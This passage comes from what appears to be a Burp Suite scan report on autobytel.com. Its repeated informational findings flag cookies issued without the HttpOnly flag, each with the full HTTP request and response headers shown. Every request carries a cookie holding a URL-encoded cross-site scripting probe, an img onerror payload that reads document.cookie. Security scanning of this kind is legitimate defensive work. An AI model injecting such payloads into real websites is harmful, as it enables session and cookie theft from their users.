User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:11 GMT
Content-Length: 32321
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.631. http://www.autobytel.com/content/home/help/index.cfm/action/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36606


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.632. http://www.autobytel.com/content/home/help/index.cfm/action/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 55317
Expires: Mon, 24 Jan 2011 23:37:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:03 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.633. http://www.autobytel.com/content/home/help/index.cfm/action/terms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB430 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.634. http://www.autobytel.com/content/home/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ID=4%3BABTL;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/home/index.cfm?id=4;ABTL HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:43 GMT;path=/
Set-Cookie: ID=;expires=Sun, 24-Jan-2010 23:38:43 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70441


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.635. http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:13 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/ HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:13 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 75062


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.636. http://www.autobytel.com/content/research/article/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:39 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/research/article/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:39 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:39 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 42750


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.637. http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Auto%20Show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:07 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/research/article/index.cfm/filters/Auto%20Show HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:07 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:07 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 53059


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.638. http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/article/index.cfm/filters/Buying%20Guide

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:02 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/research/article/index.cfm/filters/Buying%20Guide HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:25:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:25:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:25:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:25:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45588


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.639. http://www.autobytel.com/content/research/comparison/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/comparison/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:27 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/research/comparison/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:27 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 414136


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.640. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:28 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:28 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:28 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.641. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:40 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:24:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:24:40 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34688


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...

14.642. http://www.autobytel.com/content/shared/modProfile/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/shared/modProfile/index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ID=4%3BABTL;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/shared/modProfile/index.cfm?id=4;ABTL&action=handler HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
